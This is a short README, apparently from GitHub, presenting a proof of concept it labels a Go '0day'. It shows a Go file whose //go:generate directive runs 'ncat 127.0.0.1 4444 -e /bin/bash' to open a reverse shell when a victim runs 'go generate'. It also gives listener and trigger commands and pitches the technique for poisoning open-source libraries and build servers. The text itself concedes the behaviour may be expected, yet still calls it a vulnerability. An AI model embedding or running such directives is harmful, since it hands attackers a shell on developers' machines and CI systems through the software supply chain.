Awesome
golang-RCE-0day-POC
golang RCE 0day POC
see
https://twitter.com/Hktalent3135773/status/1508635999030571008
https://hackerone.com/reports/1525100
https://github.com/golang/go/issues/52059
It was officially allowed, so it was made public
https://issuetracker.google.com/issues/227263888 Maybe it's not a bug, it's the expected behavior, but it's the way of RCE(Remote Command Execution) attack in the supply chain The go generate command does not conduct security check. When compiling the associated malicious library and code, it may cause the execution of the "//go:generate [malicious command]"
Impact
1、hacker run
nc -lv 4444
2、POC
testRce.go
Code 152 BytesWrap lines Copy Download
package main
import (
"fmt"
)
//go:generate ncat 127.0.0.1 4444 -e /bin/bash
func main() {
fmt.Println("test go:generate remote command execution ")
}
3、run build
go generate -x testRce.go
4、test command execution
in "nc -lv 4444" console
Attack scenario: People who provide golang open source libraries and projects may embed malicious commands, causing users to trigger commands during compilatio
受害者
- Golang developer
- Golang open source automatic compilation integration server